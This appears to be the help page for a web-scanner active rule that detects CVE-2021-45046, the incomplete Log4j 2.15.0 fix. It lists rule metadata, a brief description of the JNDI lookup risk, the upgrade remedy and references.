| Details | |
|---|---|
| Alert ID | 40043-2 |
| Alert Type | Active |
| Status | release |
| Risk | High |
| CWE | 117 |
| WASC | 20 |
| Technologies Targeted |
Language / Java |
| Tags |
CVE-2021-45046 CWE-117 HIPAA OUT_OF_BAND OWASP_2017_A09 OWASP_2021_A06 PCI_DSS POLICY_PENTEST POLICY_QA_FULL WSTG-V42-INPV-11 |
| More Info |
Scan Rule Help |
Summary
It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments.
Solution
Upgrade Log4j2 to version 2.17.1 or newer.Other Info
References
- https://github.com/lunasec-io/lunasec/blob/c6bb0762b4ce308768baca72c7e34415402e9647/docs/blog/2021-12-09-log4j-zero-day.mdx
- https://nvd.nist.gov/vuln/detail/CVE-2021-45046